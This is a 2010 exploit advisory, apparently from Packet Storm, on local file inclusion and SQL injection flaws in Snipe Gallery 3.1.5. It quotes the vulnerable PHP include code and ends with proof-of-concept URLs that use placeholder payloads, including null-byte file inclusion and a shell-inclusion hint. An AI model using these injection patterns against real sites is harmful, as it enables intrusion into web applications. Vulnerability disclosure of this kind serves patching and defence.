Snipe Gallery 3.1.5 Local File Inclusion / SQL Injection

2010-05-21T00:00:00
ID PACKETSTORM:89774
Type packetstorm
Reporter eidelweiss
Modified 2010-05-21T00:00:00

Description

                                        
                                            `##################################################################  
snipegallery-3.1.5 Multiple Vulnerability  
##################################################################  
  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : Inj3ct0r.com 0  
1 [+] Support e-mail : submit[at]inj3ct0r.com 1  
0 0  
1 ######################################## 1  
0 I'm eidelweiss member from Inj3ct0r Team 1  
1 ######################################## 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
[+]Title: snipe gallery Multiple Vulnerability  
[+]Version: 3.1.5 (other or lower version may be also affected)  
[+]Home Page: http://www.snipegallery.com/  
[+]Download: http://sourceforge.net/project/showfiles.php?group_id=116929  
[+]Author: eidelweiss  
[+]Contact: eidelweiss[at]cyberservices[dot]com   
  
[!]Thank`s To: JosS , r0073r & 0x1D (inj3ct0r) , [D]eal [C]yber , exploit-db team & all friends  
  
########################################################  
Description:  
  
Snipe Gallery is a PHP/mySQL image management system featuring (but never limited to!): automatic watermarking, dynamic thumbnailing, online cropping/custom thumbnail tool, image dropshadows, custom "picture frames" and more!  
  
########################################################  
  
-=[ Vuln C0de ]=-  
  
  
**********************   
[-] Path/index.php  
**********************  
  
*/  
$GALLERY_SECTION = "gallery";  
$PAGE_TITLE = "Galleries";  
include ("inc/config.php");  
include ($cfg_admin_path."/lib/connect.php");  
include ($cfg_admin_path."/lib/admin.functions.php");  
include ("layout/header.php");   
  
  
**********************  
[-] path/search.php  
**********************  
  
/**  
*  
* {@source }  
*/  
  
$GALLERY_SECTION = "search";  
$PAGE_TITLE = "Search";  
  
include ("inc/config.php");  
include ($cfg_admin_path."/lib/connect.php");  
include ($cfg_admin_path."/lib/admin.functions.php");  
include ("layout/header.php");  
  
  
  
if ((empty($_REQUEST['page'])) || ($_REQUEST['page'] <= 0)){   
$page = 1;   
} else {  
$page = $_REQUEST['page'];  
}  
  
  
  
  
**********************  
[-] path/image.php  
**********************  
  
/**  
*  
* {@source }  
*/  
  
$GALLERY_SECTION = "image";  
$PAGE_TITLE = "Images";  
  
include ("inc/config.php");  
include ($cfg_admin_path."/lib/connect.php");  
include ($cfg_admin_path."/lib/admin.functions.php");  
include ($cfg_admin_path."/lib/dropdown.functions.php");  
  
/**  
  
  
**********************  
[-] path/view.php  
**********************  
  
$GALLERY_SECTION = "image";  
$PAGE_TITLE = "Images";  
  
include ("inc/config.php");  
include ($cfg_admin_path."/lib/connect.php");  
include ($cfg_admin_path."/lib/admin.functions.php");  
include ($cfg_admin_path."/lib/dropdown.functions.php");  
  
**********************  
[-] path/inc/config.php  
**********************  
  
include ($cfg_admin_path."/lang/".$cfg_use_langfile.".php");  
  
**********************  
[-] path/admin/index.php  
**********************  
$GALLERY_SECTION = "gallery";  
include ("../inc/config.php");  
include ($cfg_admin_path."/lib/admin.functions.php");  
  
**********************  
[-] path/admin/frames/index.php & path/admin/frame.php  
**********************  
  
$GALLERY_SECTION = "frames";  
$PAGE_TITLE = "Photo Frames";  
include ("../../inc/config.php");  
include ($cfg_admin_path."/lib/connect.php");  
include ($cfg_admin_path."/lib/admin.functions.php");  
include ("../layout/admin.header.php");   
  
**********************  
[-] path/admin/gallery/index.php & path/gallery/gallery.php  
**********************  
  
$GALLERY_SECTION = "gallery";  
$PAGE_TITLE = "Galleries";  
include ("../../inc/config.php");  
include ($cfg_admin_path."/lib/connect.php");  
include ($cfg_admin_path."/lib/admin.functions.php");  
include ("../layout/admin.header.php");  
  
**********************  
[-] path/admin/frames/index.php & path/admin/frame.php   
**********************  
  
  
  
**********************  
[-] path/admin/frames/index.php & path/admin/frame.php  
**********************  
  
-=[ Proof Of Concept ]=-  
  
http://127.0.0.1/view.php?gallery_id=x&page= [lfi]%00x  
http://127.0.0.1/view.php?page=x&cfg_admin_path= [lfi]%00x  
  
http://127.0.0.1/image.php?gallery_id= [SQL]  
http://127.0.0.1/image.php?gallery_id=x&cfg_admin_path= [inj3ct0r sh3ll]  
  
http://127.0.0.1/index.php?cfg_admin_path= [LFI]%00  
  
  
  
etc , etc , etc.  
  
=========================| -=[ E0F ]=- |=================================  
`